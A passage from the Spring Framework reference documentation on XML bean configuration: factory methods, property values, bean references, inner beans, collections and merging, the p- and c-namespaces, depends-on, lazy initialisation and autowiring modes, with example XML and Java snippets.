class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\tprivate AnotherBean beanOne;\n\t\tprivate YetAnotherBean beanTwo;\n\t\tprivate int i;\n\n\t\tpublic ExampleBean(\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\t\t\tthis.beanOne = anotherBean;\n\t\t\tthis.beanTwo = yetAnotherBean;\n\t\t\tthis.i = i;\n\t\t}\n\n\t}\n----\n\nThe constructor arguments specified in the bean definition will be used as arguments to\nthe constructor of the `ExampleBean`.\n\nNow consider a variant of this example, where instead of using a constructor, Spring is\ntold to call a `static` factory method to return an instance of the object:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"exampleBean\" class=\"examples.ExampleBean\" factory-method=\"createInstance\">\n\t\t<constructor-arg ref=\"anotherExampleBean\"\/>\n\t\t<constructor-arg ref=\"yetAnotherBean\"\/>\n\t\t<constructor-arg value=\"1\"\/>\n\t<\/bean>\n\n\t<bean id=\"anotherExampleBean\" class=\"examples.AnotherBean\"\/>\n\t<bean id=\"yetAnotherBean\" class=\"examples.YetAnotherBean\"\/>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ExampleBean {\n\n\t\t\/\/ a private constructor\n\t\tprivate ExampleBean(...) {\n\t\t\t...\n\t\t}\n\n\t\t\/\/ a static factory method; the arguments to this method can be\n\t\t\/\/ considered the dependencies of the bean that is returned,\n\t\t\/\/ regardless of how those arguments are actually used.\n\t\tpublic static ExampleBean createInstance (\n\t\t\tAnotherBean anotherBean, YetAnotherBean yetAnotherBean, int i) {\n\n\t\t\tExampleBean eb = new ExampleBean (...);\n\t\t\t\/\/ some other operations...\n\t\t\treturn eb;\n\t\t}\n\n\t}\n----\n\nArguments to the `static` factory method are supplied via `<constructor-arg\/>` elements,\nexactly the same as if a constructor had actually been used. The type of the class being\nreturned by the factory method does not have to be of the same type as the class that\ncontains the `static` factory method, although in this example it is. An instance\n(non-static) factory method would be used in an essentially identical fashion (aside\nfrom the use of the `factory-bean` attribute instead of the `class` attribute), so\ndetails will not be discussed here.\n\n\n\n[[beans-factory-properties-detailed]]\n=== Dependencies and configuration in detail\n\nAs mentioned in the previous section, you can define bean properties and constructor\narguments as references to other managed beans (collaborators), or as values defined\ninline. Spring's XML-based configuration metadata supports sub-element types within its\n`<property\/>` and `<constructor-arg\/>` elements for this purpose.\n\n\n[[beans-value-element]]\n==== Straight values (primitives, Strings, and so on)\n\nThe `value` attribute of the `<property\/>` element specifies a property or constructor\nargument as a human-readable string representation. Spring's\n<<core-convert-ConversionService-API, conversion service>> is used to convert these\nvalues from a `String` to the actual type of the property or argument.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\" destroy-method=\"close\">\n\t\t<!-- results in a setDriverClassName(String) call -->\n\t\t<property name=\"driverClassName\" value=\"com.mysql.jdbc.Driver\"\/>\n\t\t<property name=\"url\" value=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\/>\n\t\t<property name=\"username\" value=\"root\"\/>\n\t\t<property name=\"password\" value=\"masterkaoli\"\/>\n\t<\/bean>\n----\n\nThe following example uses the <<beans-p-namespace,p-namespace>> for even more succinct\nXML configuration.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"myDataSource\" class=\"org.apache.commons.dbcp.BasicDataSource\"\n\t\t\tdestroy-method=\"close\"\n\t\t\tp:driverClassName=\"com.mysql.jdbc.Driver\"\n\t\t\tp:url=\"jdbc:mysql:\/\/localhost:3306\/mydb\"\n\t\t\tp:username=\"root\"\n\t\t\tp:password=\"masterkaoli\"\/>\n\n\t<\/beans>\n----\n\nThe preceding XML is more succinct; however, typos are discovered at runtime rather than\ndesign time, unless you use an IDE such as http:\/\/www.jetbrains.com\/idea\/[IntelliJ\nIDEA] or the https:\/\/spring.io\/tools\/sts[Spring Tool Suite] (STS)\nthat support automatic property completion when you create bean definitions. Such IDE\nassistance is highly recommended.\n\nYou can also configure a `java.util.Properties` instance as:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"mappings\"\n\t\tclass=\"org.springframework.beans.factory.config.PropertyPlaceholderConfigurer\">\n\n\t\t<!-- typed as a java.util.Properties -->\n\t\t<property name=\"properties\">\n\t\t\t<value>\n\t\t\t\tjdbc.driver.className=com.mysql.jdbc.Driver\n\t\t\t\tjdbc.url=jdbc:mysql:\/\/localhost:3306\/mydb\n\t\t\t<\/value>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe Spring container converts the text inside the `<value\/>` element into a\n`java.util.Properties` instance by using the JavaBeans `PropertyEditor` mechanism. This\nis a nice shortcut, and is one of a few places where the Spring team do favor the use of\nthe nested `<value\/>` element over the `value` attribute style.\n\n[[beans-idref-element]]\n===== The idref element\n\nThe `idref` element is simply an error-proof way to pass the __id__ (string value - not\na reference) of another bean in the container to a `<constructor-arg\/>` or `<property\/>`\nelement.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"theTargetBean\" class=\"...\"\/>\n\n\t<bean id=\"theClientBean\" class=\"...\">\n\t\t<property name=\"targetName\">\n\t\t\t<idref bean=\"theTargetBean\" \/>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe above bean definition snippet is __exactly__ equivalent (at runtime) to the\nfollowing snippet:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"theTargetBean\" class=\"...\" \/>\n\n\t<bean id=\"client\" class=\"...\">\n\t\t<property name=\"targetName\" value=\"theTargetBean\" \/>\n\t<\/bean>\n----\n\nThe first form is preferable to the second, because using the `idref` tag allows the\ncontainer to validate __at deployment time__ that the referenced, named bean actually\nexists. In the second variation, no validation is performed on the value that is passed\nto the `targetName` property of the `client` bean. Typos are only discovered (with most\nlikely fatal results) when the `client` bean is actually instantiated. If the `client`\nbean is a <<beans-factory-scopes,prototype>> bean, this typo and the resulting exception\nmay only be discovered long after the container is deployed.\n\n[NOTE]\n====\nThe `local` attribute on the `idref` element is no longer supported in the 4.0 beans xsd\nsince it does not provide value over a regular `bean` reference anymore. Simply change\nyour existing `idref local` references to `idref bean` when upgrading to the 4.0 schema.\n====\n\nA common place (at least in versions earlier than Spring 2.0) where the `<idref\/>` element\nbrings value is in the configuration of <<aop-pfb-1,AOP interceptors>> in a\n`ProxyFactoryBean` bean definition. Using `<idref\/>` elements when you specify the\ninterceptor names prevents you from misspelling an interceptor id.\n\n\n[[beans-ref-element]]\n==== References to other beans (collaborators)\n\nThe `ref` element is the final element inside a `<constructor-arg\/>` or `<property\/>`\ndefinition element. Here you set the value of the specified property of a bean to be a\nreference to another bean (a collaborator) managed by the container. The referenced bean\nis a dependency of the bean whose property will be set, and it is initialized on demand\nas needed before the property is set. (If the collaborator is a singleton bean, it may\nbe initialized already by the container.) All references are ultimately a reference to\nanother object. Scoping and validation depend on whether you specify the id\/name of the\nother object through the `bean`, `local,` or `parent` attributes.\n\nSpecifying the target bean through the `bean` attribute of the `<ref\/>` tag is the most\ngeneral form, and allows creation of a reference to any bean in the same container or\nparent container, regardless of whether it is in the same XML file. The value of the\n`bean` attribute may be the same as the `id` attribute of the target bean, or as one of\nthe values in the `name` attribute of the target bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<ref bean=\"someBean\"\/>\n----\n\nSpecifying the target bean through the `parent` attribute creates a reference to a bean\nthat is in a parent container of the current container. The value of the `parent`\nattribute may be the same as either the `id` attribute of the target bean, or one of the\nvalues in the `name` attribute of the target bean, and the target bean must be in a\nparent container of the current one. You use this bean reference variant mainly when you\nhave a hierarchy of containers and you want to wrap an existing bean in a parent\ncontainer with a proxy that will have the same name as the parent bean.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the parent context -->\n\t<bean id=\"accountService\" class=\"com.foo.SimpleAccountService\">\n\t\t<!-- insert dependencies as required as here -->\n\t<\/bean>\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- in the child (descendant) context -->\n\t<bean id=\"accountService\" <!-- bean name is the same as the parent bean -->\n\t\tclass=\"org.springframework.aop.framework.ProxyFactoryBean\">\n\t\t<property name=\"target\">\n\t\t\t<ref parent=\"accountService\"\/> <!-- notice how we refer to the parent bean -->\n\t\t<\/property>\n\t\t<!-- insert other configuration and dependencies as required here -->\n\t<\/bean>\n----\n\n[NOTE]\n====\nThe `local` attribute on the `ref` element is no longer supported in the 4.0 beans xsd\nsince it does not provide value over a regular `bean` reference anymore. Simply change\nyour existing `ref local` references to `ref bean` when upgrading to the 4.0 schema.\n====\n\n\n[[beans-inner-beans]]\n==== Inner beans\n\nA `<bean\/>` element inside the `<property\/>` or `<constructor-arg\/>` elements defines a\nso-called __inner bean__.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"outer\" class=\"...\">\n\t\t<!-- instead of using a reference to a target bean, simply define the target bean inline -->\n\t\t<property name=\"target\">\n\t\t\t<bean class=\"com.example.Person\"> <!-- this is the inner bean -->\n\t\t\t\t<property name=\"name\" value=\"Fiona Apple\"\/>\n\t\t\t\t<property name=\"age\" value=\"25\"\/>\n\t\t\t<\/bean>\n\t\t<\/property>\n\t<\/bean>\n----\n\nAn inner bean definition does not require a defined id or name; if specified, the container\ndoes not use such a value as an identifier. The container also ignores the `scope` flag on\ncreation: Inner beans are __always__ anonymous and they are __always__ created with the outer\nbean. It is __not__ possible to inject inner beans into collaborating beans other than into\nthe enclosing bean or to access them independently.\n\nAs a corner case, it is possible to receive destruction callbacks from a custom scope, e.g.\nfor a request-scoped inner bean contained within a singleton bean: The creation of the inner\nbean instance will be tied to its containing bean, but destruction callbacks allow it to\nparticipate in the request scope's lifecycle. This is not a common scenario; inner beans\ntypically simply share their containing bean's scope.\n\n\n[[beans-collection-elements]]\n==== Collections\n\nIn the `<list\/>`, `<set\/>`, `<map\/>`, and `<props\/>` elements, you set the properties\nand arguments of the Java `Collection` types `List`, `Set`, `Map`, and `Properties`,\nrespectively.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"moreComplexObject\" class=\"example.ComplexObject\">\n\t\t<!-- results in a setAdminEmails(java.util.Properties) call -->\n\t\t<property name=\"adminEmails\">\n\t\t\t<props>\n\t\t\t\t<prop key=\"administrator\">administrator@example.org<\/prop>\n\t\t\t\t<prop key=\"support\">support@example.org<\/prop>\n\t\t\t\t<prop key=\"development\">development@example.org<\/prop>\n\t\t\t<\/props>\n\t\t<\/property>\n\t\t<!-- results in a setSomeList(java.util.List) call -->\n\t\t<property name=\"someList\">\n\t\t\t<list>\n\t\t\t\t<value>a list element followed by a reference<\/value>\n\t\t\t\t<ref bean=\"myDataSource\" \/>\n\t\t\t<\/list>\n\t\t<\/property>\n\t\t<!-- results in a setSomeMap(java.util.Map) call -->\n\t\t<property name=\"someMap\">\n\t\t\t<map>\n\t\t\t\t<entry key=\"an entry\" value=\"just some string\"\/>\n\t\t\t\t<entry key =\"a ref\" value-ref=\"myDataSource\"\/>\n\t\t\t<\/map>\n\t\t<\/property>\n\t\t<!-- results in a setSomeSet(java.util.Set) call -->\n\t\t<property name=\"someSet\">\n\t\t\t<set>\n\t\t\t\t<value>just some string<\/value>\n\t\t\t\t<ref bean=\"myDataSource\" \/>\n\t\t\t<\/set>\n\t\t<\/property>\n\t<\/bean>\n----\n\n__The value of a map key or value, or a set value, can also again be any of the\nfollowing elements:__\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tbean | ref | idref | list | set | map | props | value | null\n----\n\n[[beans-collection-elements-merging]]\n===== Collection merging\n\nThe Spring container also supports the __merging__ of collections. An application\ndeveloper can define a parent-style `<list\/>`, `<map\/>`, `<set\/>` or `<props\/>` element,\nand have child-style `<list\/>`, `<map\/>`, `<set\/>` or `<props\/>` elements inherit and\noverride values from the parent collection. That is, the child collection's values are\nthe result of merging the elements of the parent and child collections, with the child's\ncollection elements overriding values specified in the parent collection.\n\n__This section on merging discusses the parent-child bean mechanism. Readers unfamiliar\nwith parent and child bean definitions may wish to read the\n<<beans-child-bean-definitions,relevant section>> before continuing.__\n\nThe following example demonstrates collection merging:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"parent\" abstract=\"true\" class=\"example.ComplexObject\">\n\t\t\t<property name=\"adminEmails\">\n\t\t\t\t<props>\n\t\t\t\t\t<prop key=\"administrator\">administrator@example.com<\/prop>\n\t\t\t\t\t<prop key=\"support\">support@example.com<\/prop>\n\t\t\t\t<\/props>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t\t<bean id=\"child\" parent=\"parent\">\n\t\t\t<property name=\"adminEmails\">\n\t\t\t\t<!-- the merge is specified on the child collection definition -->\n\t\t\t\t<props merge=\"true\">\n\t\t\t\t\t<prop key=\"sales\">sales@example.com<\/prop>\n\t\t\t\t\t<prop key=\"support\">support@example.co.uk<\/prop>\n\t\t\t\t<\/props>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<beans>\n----\n\nNotice the use of the `merge=true` attribute on the `<props\/>` element of the\n`adminEmails` property of the `child` bean definition. When the `child` bean is resolved\nand instantiated by the container, the resulting instance has an `adminEmails`\n`Properties` collection that contains the result of the merging of the child's\n`adminEmails` collection with the parent's `adminEmails` collection.\n\n[literal]\n[subs=\"verbatim,quotes\"]\n----\nadministrator=administrator@example.com\nsales=sales@example.com\nsupport=support@example.co.uk\n----\n\nThe child `Properties` collection's value set inherits all property elements from the\nparent `<props\/>`, and the child's value for the `support` value overrides the value in\nthe parent collection.\n\nThis merging behavior applies similarly to the `<list\/>`, `<map\/>`, and `<set\/>`\ncollection types. In the specific case of the `<list\/>` element, the semantics\nassociated with the `List` collection type, that is, the notion of an `ordered`\ncollection of values, is maintained; the parent's values precede all of the child list's\nvalues. In the case of the `Map`, `Set`, and `Properties` collection types, no ordering\nexists. Hence no ordering semantics are in effect for the collection types that underlie\nthe associated `Map`, `Set`, and `Properties` implementation types that the container\nuses internally.\n\n[[beans-collection-merge-limitations]]\n===== Limitations of collection merging\n\nYou cannot merge different collection types (such as a `Map` and a `List`), and if you\ndo attempt to do so an appropriate `Exception` is thrown. The `merge` attribute must be\nspecified on the lower, inherited, child definition; specifying the `merge` attribute on\na parent collection definition is redundant and will not result in the desired merging.\n\n[[beans-collection-elements-strongly-typed]]\n===== Strongly-typed collection\n\nWith the introduction of generic types in Java 5, you can use strongly typed collections.\nThat is, it is possible to declare a `Collection` type such that it can only contain\n`String` elements (for example). If you are using Spring to dependency-inject a\nstrongly-typed `Collection` into a bean, you can take advantage of Spring's\ntype-conversion support such that the elements of your strongly-typed `Collection`\ninstances are converted to the appropriate type prior to being added to the `Collection`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class Foo {\n\n\t\tprivate Map<String, Float> accounts;\n\n\t\tpublic void setAccounts(Map<String, Float> accounts) {\n\t\t\tthis.accounts = accounts;\n\t\t}\n\t}\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<property name=\"accounts\">\n\t\t\t\t<map>\n\t\t\t\t\t<entry key=\"one\" value=\"9.99\"\/>\n\t\t\t\t\t<entry key=\"two\" value=\"2.75\"\/>\n\t\t\t\t\t<entry key=\"six\" value=\"3.99\"\/>\n\t\t\t\t<\/map>\n\t\t\t<\/property>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nWhen the `accounts` property of the `foo` bean is prepared for injection, the generics\ninformation about the element type of the strongly-typed `Map<String, Float>` is\navailable by reflection. Thus Spring's type conversion infrastructure recognizes the\nvarious value elements as being of type `Float`, and the string values `9.99, 2.75`, and\n`3.99` are converted into an actual `Float` type.\n\n\n[[beans-null-element]]\n==== Null and empty string values\n\nSpring treats empty arguments for properties and the like as empty `Strings`. The\nfollowing XML-based configuration metadata snippet sets the email property to the empty\n`String` value (\"\").\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\" value=\"\"\/>\n\t<\/bean>\n----\n\nThe preceding example is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n exampleBean.setEmail(\"\")\n----\n\nThe `<null\/>` element handles `null` values. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean class=\"ExampleBean\">\n\t\t<property name=\"email\">\n\t\t\t<null\/>\n\t\t<\/property>\n\t<\/bean>\n----\n\nThe above configuration is equivalent to the following Java code:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\texampleBean.setEmail(null)\n----\n\n\n[[beans-p-namespace]]\n==== XML shortcut with the p-namespace\n\nThe p-namespace enables you to use the `bean` element's attributes, instead of nested\n`<property\/>` elements, to describe your property values and\/or collaborating beans.\n\nSpring supports extensible configuration formats <<xsd-configuration,with namespaces>>, which are\nbased on an XML Schema definition. The `beans` configuration format discussed in this\nchapter is defined in an XML Schema document. However, the p-namespace is not defined in\nan XSD file and exists only in the core of Spring.\n\nThe following example shows two XML snippets that resolve to the same result: The first\nuses standard XML format and the second uses the p-namespace.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean name=\"classic\" class=\"com.example.ExampleBean\">\n\t\t\t<property name=\"email\" value=\"foo@bar.com\"\/>\n\t\t<\/bean>\n\n\t\t<bean name=\"p-namespace\" class=\"com.example.ExampleBean\"\n\t\t\tp:email=\"foo@bar.com\"\/>\n\t<\/beans>\n----\n\nThe example shows an attribute in the p-namespace called email in the bean definition.\nThis tells Spring to include a property declaration. As previously mentioned, the\np-namespace does not have a schema definition, so you can set the name of the attribute\nto the property name.\n\nThis next example includes two more bean definitions that both have a reference to\nanother bean:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:p=\"http:\/\/www.springframework.org\/schema\/p\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean name=\"john-classic\" class=\"com.example.Person\">\n\t\t\t<property name=\"name\" value=\"John Doe\"\/>\n\t\t\t<property name=\"spouse\" ref=\"jane\"\/>\n\t\t<\/bean>\n\n\t\t<bean name=\"john-modern\"\n\t\t\tclass=\"com.example.Person\"\n\t\t\tp:name=\"John Doe\"\n\t\t\tp:spouse-ref=\"jane\"\/>\n\n\t\t<bean name=\"jane\" class=\"com.example.Person\">\n\t\t\t<property name=\"name\" value=\"Jane Doe\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nAs you can see, this example includes not only a property value using the p-namespace,\nbut also uses a special format to declare property references. Whereas the first bean\ndefinition uses `<property name=\"spouse\" ref=\"jane\"\/>` to create a reference from bean\n`john` to bean `jane`, the second bean definition uses `p:spouse-ref=\"jane\"` as an\nattribute to do the exact same thing. In this case `spouse` is the property name,\nwhereas the `-ref` part indicates that this is not a straight value but rather a\nreference to another bean.\n\n[NOTE]\n====\nThe p-namespace is not as flexible as the standard XML format. For example, the format\nfor declaring property references clashes with properties that end in `Ref`, whereas the\nstandard XML format does not. We recommend that you choose your approach carefully and\ncommunicate this to your team members, to avoid producing XML documents that use all\nthree approaches at the same time.\n====\n\n\n[[beans-c-namespace]]\n==== XML shortcut with the c-namespace\n\nSimilar to the <<beans-p-namespace>>, the __c-namespace__, newly introduced in Spring\n3.1, allows usage of inlined attributes for configuring the constructor arguments rather\nthen nested `constructor-arg` elements.\n\nLet's review the examples from <<beans-constructor-injection>> with the `c:` namespace:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:c=\"http:\/\/www.springframework.org\/schema\/c\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\">\n\n\t\t<bean id=\"bar\" class=\"x.y.Bar\"\/>\n\t\t<bean id=\"baz\" class=\"x.y.Baz\"\/>\n\n\t\t<!-- traditional declaration -->\n\t\t<bean id=\"foo\" class=\"x.y.Foo\">\n\t\t\t<constructor-arg ref=\"bar\"\/>\n\t\t\t<constructor-arg ref=\"baz\"\/>\n\t\t\t<constructor-arg value=\"foo@bar.com\"\/>\n\t\t<\/bean>\n\n\t\t<!-- c-namespace declaration -->\n\t\t<bean id=\"foo\" class=\"x.y.Foo\" c:bar-ref=\"bar\" c:baz-ref=\"baz\" c:email=\"foo@bar.com\"\/>\n\n\t<\/beans>\n----\n\nThe `c:` namespace uses the same conventions as the `p:` one (trailing `-ref` for bean\nreferences) for setting the constructor arguments by their names. And just as well, it\nneeds to be declared even though it is not defined in an XSD schema (but it exists\ninside the Spring core).\n\nFor the rare cases where the constructor argument names are not available (usually if\nthe bytecode was compiled without debugging information), one can use fallback to the\nargument indexes:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- c-namespace index declaration -->\n\t<bean id=\"foo\" class=\"x.y.Foo\" c:_0-ref=\"bar\" c:_1-ref=\"baz\"\/>\n----\n\n[NOTE]\n====\nDue to the XML grammar, the index notation requires the presence of the leading `_` as\nXML attribute names cannot start with a number (even though some IDE allow it).\n====\n\nIn practice, the constructor resolution\n<<beans-factory-ctor-arguments-resolution,mechanism>> is quite efficient in matching\narguments so unless one really needs to, we recommend using the name notation\nthrough-out your configuration.\n\n\n[[beans-compound-property-names]]\n==== Compound property names\n\nYou can use compound or nested property names when you set bean properties, as long as\nall components of the path except the final property name are not `null`. Consider the\nfollowing bean definition.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"foo\" class=\"foo.Bar\">\n\t\t<property name=\"fred.bob.sammy\" value=\"123\" \/>\n\t<\/bean>\n----\n\nThe `foo` bean has a `fred` property, which has a `bob` property, which has a `sammy`\nproperty, and that final `sammy` property is being set to the value `123`. In order for\nthis to work, the `fred` property of `foo`, and the `bob` property of `fred` must not be\n`null` after the bean is constructed, or a `NullPointerException` is thrown.\n\n\n\n[[beans-factory-dependson]]\n=== Using depends-on\n\nIf a bean is a dependency of another that usually means that one bean is set as a\nproperty of another. Typically you accomplish this with the <<beans-ref-element, `<ref\/>`\nelement>> in XML-based configuration metadata. However, sometimes dependencies between\nbeans are less direct; for example, a static initializer in a class needs to be\ntriggered, such as database driver registration. The `depends-on` attribute can\nexplicitly force one or more beans to be initialized before the bean using this element\nis initialized. The following example uses the `depends-on` attribute to express a\ndependency on a single bean:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager\"\/>\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n----\n\nTo express a dependency on multiple beans, supply a list of bean names as the value of\nthe `depends-on` attribute, with commas, whitespace and semicolons, used as valid\ndelimiters:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"beanOne\" class=\"ExampleBean\" depends-on=\"manager,accountDao\">\n\t\t<property name=\"manager\" ref=\"manager\" \/>\n\t<\/bean>\n\n\t<bean id=\"manager\" class=\"ManagerBean\" \/>\n\t<bean id=\"accountDao\" class=\"x.y.jdbc.JdbcAccountDao\" \/>\n----\n\n[NOTE]\n====\nThe `depends-on` attribute in the bean definition can specify both an initialization\ntime dependency and, in the case of <<beans-factory-scopes-singleton,singleton>> beans\nonly, a corresponding destroy time dependency. Dependent beans that define a\n`depends-on` relationship with a given bean are destroyed first, prior to the given bean\nitself being destroyed. Thus `depends-on` can also control shutdown order.\n====\n\n\n\n[[beans-factory-lazy-init]]\n=== Lazy-initialized beans\n\nBy default, `ApplicationContext` implementations eagerly create and configure all\n<<beans-factory-scopes-singleton,singleton>> beans as part of the initialization\nprocess. Generally, this pre-instantiation is desirable, because errors in the\nconfiguration or surrounding environment are discovered immediately, as opposed to hours\nor even days later. When this behavior is __not__ desirable, you can prevent\npre-instantiation of a singleton bean by marking the bean definition as\nlazy-initialized. A lazy-initialized bean tells the IoC container to create a bean\ninstance when it is first requested, rather than at startup.\n\nIn XML, this behavior is controlled by the `lazy-init` attribute on the `<bean\/>`\nelement; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"lazy\" class=\"com.foo.ExpensiveToCreateBean\" lazy-init=\"true\"\/>\n\t<bean name=\"not.lazy\" class=\"com.foo.AnotherBean\"\/>\n----\n\nWhen the preceding configuration is consumed by an `ApplicationContext`, the bean named\n`lazy` is not eagerly pre-instantiated when the `ApplicationContext` is starting up,\nwhereas the `not.lazy` bean is eagerly pre-instantiated.\n\nHowever, when a lazy-initialized bean is a dependency of a singleton bean that is\n__not__ lazy-initialized, the `ApplicationContext` creates the lazy-initialized bean at\nstartup, because it must satisfy the singleton's dependencies. The lazy-initialized bean\nis injected into a singleton bean elsewhere that is not lazy-initialized.\n\nYou can also control lazy-initialization at the container level by using the\n`default-lazy-init` attribute on the `<beans\/>` element; for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans default-lazy-init=\"true\">\n\t\t<!-- no beans will be pre-instantiated... -->\n\t<\/beans>\n----\n\n\n\n[[beans-factory-autowire]]\n=== Autowiring collaborators\n\nThe Spring container can __autowire__ relationships between collaborating beans. You can\nallow Spring to resolve collaborators (other beans) automatically for your bean by\ninspecting the contents of the `ApplicationContext`. Autowiring has the following\nadvantages:\n\n* Autowiring can significantly reduce the need to specify properties or constructor\n arguments. (Other mechanisms such as a bean template\n <<beans-child-bean-definitions,discussed elsewhere in this chapter>> are also valuable\n in this regard.)\n* Autowiring can update a configuration as your objects evolve. For example, if you need\n to add a dependency to a class, that dependency can be satisfied automatically without\n you needing to modify the configuration. Thus autowiring can be especially useful\n during development, without negating the option of switching to explicit wiring when\n the code base becomes more stable.\n\nWhen using XML-based configuration metadata footnote:[See\npass:specialcharacters,macros[<<beans-factory-collaborators>>]], you specify autowire\nmode for a bean definition with the `autowire` attribute of the `<bean\/>` element. The\nautowiring functionality has four modes. You specify autowiring __per__ bean and thus\ncan choose which ones to autowire.\n\n[[beans-factory-autowiring-modes-tbl]]\n.Autowiring modes\n|===\n| Mode| Explanation\n\n| no\n| (Default) No autowiring. Bean references must be defined via a `ref` element. Changing\n the default setting is not recommended for larger deployments, because specifying\n collaborators explicitly gives greater control and clarity. To some extent, it\n documents the structure of a system.\n\n| byName\n| Autowiring by property name. Spring looks for a bean with the same name as the\n property that needs to be autowired. For example, if a bean definition is set to\n autowire by name, and it contains a __master__ property (that is, it has a\n __setMaster(..)__ method), Spring looks for a bean definition named `master`, and uses\n it to set the property.\n\n| byType\n| Allows a property to be autowired if exactly one bean of the property type exists in\n the container. If more than one exists, a fatal exception is thrown, which indicates\n that you may not use __byType__ autowiring for that bean. If there are no matching\n beans, nothing happens; the property is not set.\n\n| constructor\n| Analogous to __byType__, but applies to constructor arguments. If there is not exactly\n one bean of the constructor argument type in the container, a fatal error is raised.\n|===\n\nWith __byType__ or __constructor__ autowiring mode, you can wire arrays and\ntyped-collections. In such cases __all__ autowire candidates within the container that\nmatch the expected type are provided to satisfy the dependency. You can autowire\nstrongly-typed Maps if the expected key type is `String`. An autowired Maps values will\nconsist of all bean instances that match the expected type, and the Maps keys will\ncontain the corresponding bean names.\n\nYou can combine autowire behavior with dependency checking, which is performed after\nautowiring completes.\n\n\n[[beans-autowired-exceptions]]\n==== Limitations and disadvantages of autowiring\n\nAutowiring works best when it is used consistently across a project. If autowiring is\nnot used in general, it might be confusing to developers to use it to wire only one or\ntwo bean definitions.\n\nConsider the limitations and disadvantages of autowiring:\n\n* Explicit dependencies in `property` and `constructor-arg` settings always override\n autowiring. You cannot autowire so-called __simple__ properties such as primitives,\n `Strings`, and `Classes` (and arrays of such simple properties). This limitation is\n by-design.\n* Autowiring is less exact than explicit wiring. Although, as noted in the above table,\n Spring is careful to avoid guessing in case of ambiguity that might have unexpected\n results, the relationships between your Spring-managed objects are no longer\n documented explicitly.\n* Wiring information may not be available to tools that may generate documentation from\n a Spring 